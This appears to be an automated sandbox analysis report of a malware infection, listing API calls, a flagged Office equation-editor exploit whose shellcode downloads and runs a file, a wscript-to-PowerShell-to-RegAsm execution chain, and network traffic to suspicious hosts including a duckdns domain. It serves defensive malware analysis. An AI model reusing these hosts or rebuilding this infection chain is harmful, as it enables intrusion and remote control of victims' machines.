                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E879 FindFirstFileExA,14_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040783C FindFirstFileW,FindNextFileW,14_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Shellcode detected
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0033209D ShellExecuteW,ExitProcess,9_2_0033209D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00331FBA LoadLibraryW,9_2_00331FBA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00332088 ShellExecuteW,ExitProcess,9_2_00332088
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00331EDD ExitProcess,9_2_00331EDD
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003320C2 ExitProcess,9_2_003320C2
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: zhort.de
                Source: global trafficDNS query: name: ia803104.us.archive.org
                Source: global trafficDNS query: name: 2024remcmon.duckdns.org
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
